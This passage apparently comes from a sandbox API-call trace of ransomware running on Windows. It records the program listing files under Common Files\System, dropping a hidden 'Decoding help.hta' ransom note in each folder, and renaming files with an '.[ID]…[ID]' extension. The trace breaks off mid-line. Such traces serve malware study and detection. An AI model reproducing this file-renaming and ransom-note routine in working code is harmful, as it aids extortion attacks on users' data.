hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6fc88a7, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb6fc88a7, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb6f0a1cc, ftLastWriteTime.dwHighDateTime=0x1ca0417, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadomd28.tlb", cAlternateFileName="")) returned 1 [0044.796] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.796] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.796] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadomd28.tlb") returned -1 [0044.796] lstrlenW (lpString="msadomd28.tlb") returned 13 [0044.797] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.797] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.797] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msadomd28.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb" [0044.797] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb" [0044.797] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd28.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.833] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f0bf91, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92f0bf91, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92f0bf91, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msador15.dll", cAlternateFileName="")) returned 1 [0044.833] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.833] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.833] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.834] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msador15.dll") returned -1 [0044.834] lstrlenW (lpString="msador15.dll") returned 12 [0044.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msador15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll" [0044.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll" [0044.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msador15.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msador15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.834] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9c1e89, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9e9c1e89, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9e9e7fe9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadox.dll", cAlternateFileName="")) returned 1 [0044.834] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.834] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadox.dll") returned -1 [0044.834] lstrlenW (lpString="msadox.dll") returned 10 [0044.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msadox.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" [0044.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" [0044.835] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.835] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6e25992, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb6e25992, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb6db3575, ftLastWriteTime.dwHighDateTime=0x1ca0417, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadox28.tlb", cAlternateFileName="")) returned 1 [0044.835] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.835] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.835] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.835] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadox28.tlb") returned -1 [0044.835] lstrlenW (lpString="msadox28.tlb") returned 12 [0044.835] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.835] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.835] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msadox28.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb" [0044.835] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb" [0044.835] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox28.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.835] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb775ee94, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb775ee94, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9b894690, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadrh15.dll", cAlternateFileName="")) returned 1 [0044.835] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.835] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.835] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.836] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadrh15.dll") returned -1 [0044.836] lstrlenW (lpString="msadrh15.dll") returned 12 [0044.836] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.836] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.836] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msadrh15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll" [0044.836] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll" [0044.836] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadrh15.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadrh15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.836] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x831d597f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x831d597f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x831d597f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjro.dll", cAlternateFileName="")) returned 1 [0044.836] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.836] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.836] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.836] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msjro.dll") returned -1 [0044.836] lstrlenW (lpString="msjro.dll") returned 9 [0044.836] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.836] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.836] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msjro.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll" [0044.836] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll" [0044.836] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msjro.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msjro.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.836] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x831d597f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x831d597f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x831d597f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjro.dll", cAlternateFileName="")) returned 0 [0044.837] FindClose (in: hFindFile=0x5da378 | out: hFindFile=0x5da378) returned 1 Thread: id = 438 os_tid = 0xb98 [0044.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*", lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e30f0 [0044.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.496] FindNextFileW (in: hFindFile=0x5e30f0, lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.496] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.496] FindNextFileW (in: hFindFile=0x5e30f0, lpFindFileData=0x1ca9fd30 | out: lpFindFileData=0x1ca9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e3de6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc9e3de6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0044.496] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*" [0044.496] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*") returned 56 [0044.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\Decoding help.hta" [0044.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\decoding help.hta")) returned 0xffffffff [0044.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x704 [0044.497] WriteFile (in: hFile=0x704, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ca9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ca9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.498] CloseHandle (hObject=0x704) returned 1 [0044.499] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.499] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab32res.dll.mui") returned -1 [0044.499] lstrlenW (lpString="wab32res.dll.mui") returned 16 [0044.499] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*" [0044.499] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*") returned 56 [0044.499] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\", lpString2="wab32res.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui" [0044.499] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui" [0044.499] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0044.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\wab32res.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common 